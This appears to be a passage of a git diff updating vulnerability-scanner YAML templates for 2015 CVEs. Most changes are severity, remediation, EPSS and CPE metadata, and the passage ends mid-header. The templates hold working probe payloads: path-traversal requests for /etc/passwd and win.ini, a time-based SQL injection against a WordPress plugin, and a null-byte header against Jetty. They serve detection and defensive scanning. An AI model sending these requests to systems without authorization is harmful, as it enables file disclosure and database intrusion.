http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-2080 cwe-id: CWE-200 - tags: cve,cve2015,jetty,packetstorm + epss-score: 0.95465 + epss-percentile: 0.99162 + cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: fedoraproject + product: fedora + tags: cve,cve2015,jetty,packetstorm http: - method: POST path: - "{{BaseURL}}" + headers: Referer: \x00 matchers-condition: and matchers: + - type: word + part: body + words: + - "Illegal character 0x0 in state" + - type: status status: - 400 - - type: word - words: - - "Illegal character 0x0 in state" - part: body -# Enhanced by mp on 2022/04/21 +# digest: 4a0a004730450220129aaeda40bc632a74714e12fd42b4c9f6f6f3d7ea012a82d080cb539526b56702210093f98414a35cf4eb85efaf9a586384d6a2f93b1990cff6498d1d6fbafab10dc9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index 7ae6bb612c..840ee70f52 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -3,21 +3,28 @@ id: CVE-2015-2166 info: name: Ericsson Drutt MSDP - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the Ericsson Drutt MSDP application. reference: - https://www.exploit-db.com/exploits/36619 - https://nvd.nist.gov/vuln/detail/CVE-2015-2166 - http://packetstormsecurity.com/files/131233/Ericsson-Drutt-MSDP-Instance-Monitor-Directory-Traversal-File-Access.html - - http://web.archive.org/web/20210122142229/https://www.securityfocus.com/bid/73901/ + - https://www.exploit-db.com/exploits/36619/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2015-2166 cwe-id: CWE-22 - tags: cve,cve2015,lfi,ericsson,edb,packetstorm + epss-score: 0.27262 + epss-percentile: 0.96245 + cpe: cpe:2.3:a:ericsson:drutt_mobile_service_delivery_platform:4.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ericsson + product: drutt_mobile_service_delivery_platform + tags: cve,cve2015,lfi,ericsson,edb,packetstorm http: - method: GET @@ -35,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/08 +# digest: 490a00463044022038178edc94923cd01c2bf00e6b56e9ba4623f0c5dcf0f9a160c3e0c5820dab4902204bf00e9060eb8705600d1839a9fa7b430ee191191b5c6131bfb7c7c99a6e1141:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index 97179e8e4a..71ab54828e 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -3,23 +3,29 @@ id: CVE-2015-2196 info: name: WordPress Spider Calendar <=1.4.9 - SQL Injection author: theamanrawat - severity: critical + severity: high description: | WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + remediation: Fixed in version 1.4.14. reference: - https://wpscan.com/vulnerability/8d436356-37f8-455e-99b3-effe8d0e3cad - https://wordpress.org/plugins/spider-event-calendar/ - http://www.exploit-db.com/exploits/36061 - https://nvd.nist.gov/vuln/detail/CVE-2015-2196 - remediation: Fixed in version 1.4.14. classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2015-2196 cwe-id: CWE-89 + epss-score: 0.0093 + epss-percentile: 0.81258 + cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: web-dorado + product: spider_calendar + framework: wordpress tags: wordpress,wp,sqli,cve2015,wpscan,wp-plugin,spider-event-calendar,unauth,edb,cve http: @@ -37,4 +43,4 @@ http: - 'contains(body, "{\"status\":true,\"data\"")' condition: and -# Enhanced by md on 2023/04/12 +# digest: 4a0a0047304502203b592fc7a18d9caf4f00ea3dd292515adbcf4b30402ee3f58238203dc2474c26022100ca99c33f847b0c201ac5ba4e693ec501679717b180439ee924aa0930dea6f118:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index a2a65acab1..6b757af81e 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -6,19 +6,28 @@ info: severity: medium description: | WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php. + remediation: | + Update to the latest version of the AB Google Map Travel plugin (>=3.5) or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/131155/ - http://packetstormsecurity.com/files/131155/WordPress-Google-Map-Travel-3.4-XSS-CSRF.html - http://packetstormsecurity.com/files/130960/WordPress-AB-Google-Map-Travel-CSRF-XSS.html - https://nvd.nist.gov/vuln/detail/https://nvd.nist.gov/vuln/detail/CVE-2015-2755 + - https://wordpress.org/plugins/ab-google-map-travel/changelog/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2015-2755 - cwe-id: CWE-79 + cwe-id: CWE-352 + epss-score: 0.02569 + epss-percentile: 0.89059 + cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true + max-request: 2 + vendor: ab_google_map_travel_project + product: ab_google_map_travel + framework: wordpress tags: cve2015,xss,wordpress,wp-plugin,wp,ab-map,packetstorm,cve http: @@ -29,7 +38,6 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | @timeout: 10s POST /wp-admin/admin.php?page=ab_map_options HTTP/1.1 @@ -48,4 +56,4 @@ http: - 'contains(body_2, "ab-google-map-travel")' condition: and -# Enhanced by md on 2023/03/13 +# digest: 4a0a004730450220752e8f5eee3b93ae48474c08f3be47ef7ff6e71b23fb5f3f9d33559b0afc0cf6022100c13c5a242bfbecd9f0778b9bb7e8bdfe4623620163858fb55bbde900281ad889:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index a10ac51c1b..15ae67e856 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -5,18 +5,27 @@ info: author: daffainfo severity: medium description: Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter. + remediation: | + Upgrade to a version higher than 0.1.1 that includes proper input sanitization to mitigate the XSS vulnerability. reference: - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ - https://security.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ - https://wordpress.org/plugins/navis-documentcloud/changelog/ - https://nvd.nist.gov/vuln/detail/CVE-2015-2807 + - https://wpvulndb.com/vulnerabilities/8164 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-2807 cwe-id: CWE-79 + epss-score: 0.00665 + epss-percentile: 0.77421 + cpe: cpe:2.3:a:documentcloud:navis_documentcloud:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: documentcloud + product: navis_documentcloud + framework: wordpress google-query: inurl:"/wp-content/plugins/navis-documentcloud" tags: cve,cve2015,wordpress,wp-plugin,xss @@ -28,9 +37,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header @@ -41,4 +50,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4b0a00483046022100c205f412faf2aa91d56b9cfd3dc3a36170277ace96a743cc3a04bed53e1f92e2022100ee1298edd6dfb5e0fb0ffbd580cc4105d85f0ba85171d4aeb983a4da9b2ca5d9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index 2ff19761e5..8b58b356b2 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -6,18 +6,25 @@ info: severity: medium description: | Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. + remediation: | + Apply the latest security patches and updates provided by Kaseya to fix the open redirect vulnerability in the Kaseya Virtual System Administrator (VSA). reference: - https://github.com/pedrib/PoC/blob/3f927b957b86a91ce65b017c4b9c93d05e241592/advisories/Kaseya/kaseya-vsa-vuln.txt - http://www.kb.cert.org/vuls/id/919604 - https://nvd.nist.gov/vuln/detail/CVE-2015-2863 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2015-2863 cwe-id: CWE-601 - tags: cve,cve2015,redirect,kaseya + epss-score: 0.00626 + epss-percentile: 0.76641 + cpe: cpe:2.3:a:kaseya:virtual_system_administrator:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: kaseya + product: virtual_system_administrator + tags: cve,cve2015,redirect,kaseya http: - method: GET @@ -32,4 +39,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 -# Enhanced by md on 2023/03/21 +# digest: 4a0a00473045022100e3a319b3416d4412d528920dc9c41ecb87234b899d1bd8a649bd6065394980bc0220324fbcf625794535be6105e9cbc4821b09ac473a12f50c290c28a04045b211e6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index 3532843519..6afc024f19 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -6,18 +6,25 @@ info: severity: high description: | SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum. + remediation: | + Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability. reference: - https://seclists.org/fulldisclosure/2015/Jun/8 - https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk - http://seclists.org/fulldisclosure/2015/Jun/8 - https://nvd.nist.gov/vuln/detail/CVE-2015-2996 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C + cvss-score: 8.5 cve-id: CVE-2015-2996 cwe-id: CWE-22 + epss-score: 0.77754 + epss-percentile: 0.97878 + cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: sysaid + product: sysaid shodan-query: http.favicon.hash:1540720428 tags: cve,cve2015,sysaid,lfi,seclists @@ -28,6 +35,7 @@ http: - "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd" stop-at-first-match: true + matchers-condition: and matchers: - type: regex @@ -38,4 +46,4 @@ http: status: - 200 -# Enhanced by md on 2023/02/22 +# digest: 4a0a00473045022100869f678e18457b74e8692748dd03a698a4de5f94abad61c68a33239a78eb915402207ba3e24b23332841e0f454b38c9403aef9cd4d6848c5a6e58b3da448127f343f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index 1703df4634..1eccf5173b 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -6,20 +6,28 @@ info: severity: high description: | TP-LINK is susceptible to local file inclusion in these products: Archer C5 (1.2) with firmware before 150317, Archer C7 (2.0) with firmware before 150304, and C8 (1.0) with firmware before 150316, Archer C9 (1.0), TL-WDR3500 (1.0), TL-WDR3600 (1.0), and TL-WDR4300 (1.0) with firmware before 150302, TL-WR740N (5.0) and TL-WR741ND (5.0) with firmware before 150312, and TL-WR841N (9.0), TL-WR841N (10.0), TL-WR841ND (9.0), and TL-WR841ND (10.0) with firmware before 150310. Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed. + remediation: | + Apply the latest firmware update provided by TP-LINK to fix the local file inclusion vulnerability. reference: - https://seclists.org/fulldisclosure/2015/Apr/26 - https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150410-0_TP-Link_Unauthenticated_local_file_disclosure_vulnerability_v10.txt - http://www.tp-link.com/en/download/TL-WDR3600_V1.html#Firmware - https://nvd.nist.gov/vuln/detail/CVE-2015-3035 + - http://www.tp-link.com/en/download/Archer-C5_V1.20.html#Firmware classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N + cvss-score: 7.8 cve-id: CVE-2015-3035 cwe-id: CWE-22 + epss-score: 0.58993 + epss-percentile: 0.97376 + cpe: cpe:2.3:o:tp-link:tl-wr841n_\(9.0\)_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"TP-LINK" verified: true + max-request: 1 + vendor: tp-link + product: tl-wr841n_\(9.0\)_firmware + shodan-query: http.title:"TP-LINK" tags: router,lfi,seclists,cve,cve2015,tplink,kev http: @@ -37,4 +45,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/30 +# digest: 4a0a004730450220794b9ec93cadbc632bbfec6c89d208d29c979f81a870f394dce4f00b5a9159fb022100e5ef32fc5b24ef7c564e235161f47afb133e3cdcfcda275ca1f16ccfe069bc1a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index edaa2d8033..d3fb58863d 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -3,21 +3,29 @@ id: CVE-2015-3224 info: name: Ruby on Rails Web Console - Remote Code Execution author: pdteam - severity: critical + severity: medium description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb. + remediation: | + Upgrade to a patched version of Ruby on Rails or disable the Web Console feature. reference: - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/ - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/ - https://hackerone.com/reports/44513 - https://nvd.nist.gov/vuln/detail/CVE-2015-3224 + - http://lists.fedoraproject.org/pipermail/package-announce/2015-June/160881.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-3224 cwe-id: CWE-284 - tags: ruby,hackerone,cve,cve2015,rce,rails + epss-score: 0.93857 + epss-percentile: 0.98868 + cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: rubyonrails + product: web_console + tags: ruby,hackerone,cve,cve2015,rce,rails,intrusive http: - method: GET @@ -39,10 +47,10 @@ http: - type: word part: response words: - - "X-Web-Console-Session-Id" - - "data-remote-path=" - - "data-session-id=" + - X-Web-Console-Session-Id + - data-remote-path= + - data-session-id= case-insensitive: true condition: or -# Enhanced by mp on 2022/05/10 +# digest: 4a0a00473045022100ff5eb7aa7df7e00024dc9453b3cceb09f210f129438eda05158fa3c8dae3cc4f022037cb323f02b4b2389fb02aed03217860054998665d89f41224d0a3bf3220d864:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index 51f7c9d212..d883b3f31d 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -3,22 +3,29 @@ id: CVE-2015-3337 info: name: Elasticsearch - Local File Inclusion author: pdteam - severity: high + severity: medium description: Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled. + remediation: | + Upgrade to a patched version of Elasticsearch or apply the necessary security patches. reference: - https://www.exploit-db.com/exploits/37054/ - - http://web.archive.org/web/20210121084446/https://www.securityfocus.com/archive/1/535385 - https://www.elastic.co/community/security - http://www.debian.org/security/2015/dsa-3241 - https://nvd.nist.gov/vuln/detail/CVE-2015-3337 + - http://packetstormsecurity.com/files/131646/Elasticsearch-Directory-Traversal.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2015-3337 cwe-id: CWE-22 - tags: edb,cve,cve2015,elastic,lfi,elasticsearch,plugin + epss-score: 0.96596 + epss-percentile: 0.9949 + cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: elasticsearch + product: elasticsearch + tags: packetstorm,edb,cve,cve2015,elastic,lfi,elasticsearch,plugin http: - method: GET @@ -28,12 +35,12 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: - 200 -# Enhanced by mp on 2022/06/08 +# digest: 4a0a00473045022100cbbd60e47aa79b34dd945b0654c07c0add24b8eb123a90dd064a39b0a3eefa4202200f838aa1ee6f3ec851f7bffd9a8f18c99d69c7fbdc4fc6af87b88715b9432467:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index f17f30353b..db84f402c0 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -5,9 +5,10 @@ info: author: pikpikcu severity: high description: ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. + remediation: | + Upgrade to the latest version of ResourceSpace to fix the local file inclusion vulnerability. reference: - https://vulners.com/cve/CVE-2015-3648/ - - http://web.archive.org/web/20210122163815/https://www.securityfocus.com/bid/75019/ - http://svn.montala.com/websvn/revision.php?repname=ResourceSpace&path=%2F&rev=6640&peg=6738 - http://packetstormsecurity.com/files/132142/ResourceSpace-7.1.6513-Local-File-Inclusion.html - https://nvd.nist.gov/vuln/detail/CVE-2015-3648 @@ -16,9 +17,14 @@ info: cvss-score: 7.5 cve-id: CVE-2015-3648 cwe-id: CWE-22 - tags: lfi,resourcespace,packetstorm,cve,cve2015 + epss-score: 0.02644 + epss-percentile: 0.892 + cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: montala + product: resourcespace + tags: lfi,resourcespace,packetstorm,cve,cve2015 http: - method: GET @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/08 +# digest: 490a00463044022001f9ca187fcc1f734369800d1ec1b2f25a99a0e266be300e18a44b52389137910220466c8ceb1e4aaa6c4f78b96a1fc3e594bcb666afb81f3a0f89109a4f17e17c96:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index 086b601333..8dc549bcd4 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -3,21 +3,28 @@ id: CVE-2015-3897 info: name: Bonita BPM Portal <6.5.3 - Local File Inclusion author: 0x_Akoko - severity: high + severity: medium description: Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource. + remediation: | + Upgrade Bonita BPM Portal to version 6.5.3 or later to mitigate the vulnerability. reference: - https://packetstormsecurity.com/files/132237/Bonita-BPM-6.5.1-Directory-Traversal-Open-Redirect.html - https://www.bonitasoft.com/ - https://nvd.nist.gov/vuln/detail/CVE-2015-3897 - https://www.htbridge.com/advisory/HTB23259 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2015-3897 cwe-id: CWE-22 - tags: unauth,packetstorm,cve,cve2015,bonita,lfi + epss-score: 0.83225 + epss-percentile: 0.98074 + cpe: cpe:2.3:a:bonitasoft:bonita_bpm_portal:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: bonitasoft + product: bonita_bpm_portal + tags: unauth,packetstorm,cve,cve2015,bonita,lfi http: - method: GET @@ -26,6 +33,7 @@ http: - "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini" stop-at-first-match: true + matchers-condition: or matchers: - type: word @@ -40,4 +48,4 @@ http: regex: - "root:[x*]:0:0:" -# Enhanced by mp on 2022/06/08 +# digest: 4a0a004730450221009ca0e73f5786de413ee84cbb3b517935099118fffc8215153ab9a3ea0b95aece022002d8f8d0689b0b9bfa39db87876d77f5038586dde74f88c4a6f735e1c83e7a40:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index 15e7999f24..2942b1828f 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -3,21 +3,29 @@ id: CVE-2015-4050 info: name: Symfony - Authentication Bypass author: ELSFA7110,meme-lord - severity: high + severity: medium description: Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component. + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Symfony. reference: - https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access - http://symfony.com/blog/cve-2015-4050-esi-unauthorized-access - http://www.debian.org/security/2015/dsa-3276 - https://nvd.nist.gov/vuln/detail/CVE-2015-4050 + - http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159513.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-4050 cwe-id: CWE-284 - tags: cve,cve2015,symfony,rce + epss-score: 0.00847 + epss-percentile: 0.8028 + cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: sensiolabs + product: symfony + tags: cve,cve2015,symfony,rce http: - method: GET @@ -27,12 +35,12 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "PHP Credits" - part: body - type: status status: - 200 -# Enhanced by mp on 2022/06/08 +# digest: 4a0a0047304502202ca97d0e5abba0f94d2ea721fd1d6cacf82e84c5905ab2da742a4c4568219dff022100cc9330626b06eac848544d6401304fd21119edbe4e41e933f1b2b7bc1e445832:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index 6ac4995fbf..662eb3a0ed 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -3,24 +3,31 @@ id: CVE-2015-4062 info: name: WordPress NewStatPress 0.9.8 - SQL Injection author: r3Y3r53 - severity: critical + severity: medium description: | WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php. + remediation: | + Update to plugin version 0.9.9 or latest. reference: - https://packetstormsecurity.com/files/132038/ - https://wordpress.org/plugins/newstatpress - http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2015-4062 - remediation: | - Update to plugin version 0.9.9 or latest. + - https://wordpress.org/plugins/newstatpress/changelog/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:P/A:P + cvss-score: 6.5 cve-id: CVE-2015-4062 cwe-id: CWE-89 + epss-score: 0.02803 + epss-percentile: 0.89492 + cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true + max-request: 2 + vendor: newstatpress_project + product: newstatpress + framework: wordpress tags: authenticated,cve,sqli,wp-plugin,newstatpress,packetstorm,cve2015,wordpress,wp http: @@ -31,7 +38,6 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1 Host: {{Hostname}} @@ -45,4 +51,4 @@ http: - 'contains(body_2, "newstatpress_page_nsp_search")' condition: and -# Enhanced by md on 2023/03/13 +# digest: 4b0a00483046022100c47df8c2349785382b12af067acb86e65f6b49dbe595846904d8e5d0c2ad1dc9022100d83b88d28f639e0885cfb88071f0d5c3307001c464bce8f6a80809a421f76d18:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index 5cd1a3595c..ccad769421 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -3,23 +3,30 @@ id: CVE-2015-4063 info: name: NewStatPress <0.9.9 - Cross-Site Scripting author: r3Y3r53 - severity: medium + severity: low description: | WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php. + remediation: Update to plugin version 0.9.9 or latest. reference: - https://packetstormsecurity.com/files/132038/ - https://wordpress.org/plugins/newstatpress/ - http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2015-4063 - remediation: Update to plugin version 0.9.9 or latest. + - https://wordpress.org/plugins/newstatpress/changelog/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:S/C:N/I:P/A:N + cvss-score: 3.5 cve-id: CVE-2015-4063 - cwe-id: CWE-80 + cwe-id: CWE-79 + epss-score: 0.04016 + epss-percentile: 0.91069 + cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true + max-request: 2 + vendor: newstatpress_project + product: newstatpress + framework: wordpress tags: cve,cve2015,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm http: @@ -30,7 +37,6 @@ http: Content-Type: application/x-www-form-urlencoded log=admin&pwd=admin123&wp-submit=Log+In - - | GET /wp-admin/admin.php?where1=&searchsubmit=Buscar&page=nsp_search HTTP/1.1 Host: {{Hostname}} @@ -43,4 +49,4 @@ http: - "contains(body_2, '') && contains(body_2, 'newstatpress')" condition: and -# Enhanced by md on 2023/03/13 +# digest: 4b0a00483046022100dcad6b3a6076912e27d1845bf5f182cb353ec0a5edbd9864d7fbacfe5466bb8a022100846ec5d171737319f6e9329fa95392fd1e7ce5791a1002727780d941e9a47b1b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index 969f94188f..76c1d660d0 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ 